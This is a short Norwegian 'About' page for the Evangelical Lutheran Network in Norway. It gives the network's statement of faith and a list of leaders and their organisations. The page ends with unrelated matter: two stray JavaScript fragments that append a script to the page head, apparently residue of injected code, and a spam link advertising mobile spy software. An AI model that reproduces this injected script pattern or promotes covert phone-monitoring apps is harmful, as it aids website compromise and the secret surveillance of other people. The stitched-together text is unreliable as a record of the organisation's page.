Om ELN

Evangelisk luthersk nettverk i Norge består av organisasjoner og kirker som bygger lokale fellesskap på evangelisk luthersk grunn. Vi samles på en plattform av tillit til Bibelen som Guds åpenbarte og pålitelige ord til oss under forpliktelse av alt den fastholder om kristen tro og kristent liv.

Kontakter/lederskap:

  • Rolf Kjøde, talsmann, Rolf.Kjode(a)NLA.no
  • Anne Birgitta Langmoen Kvelland, Normisjon
  • Øyvind Åsland, NLM
  • Jarle Skullerud, Frikirken
  • Erik Furnes, ImF,
  • Rolf Ekenes, DELK,
  • Kåre Skråmestø, sokneprest i Oppsal menighet


d.getElementsByTagName(‘head’)[0].appendChild(s);

d.getElementsByTagName(‘head’)[0].appendChild(s);

https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.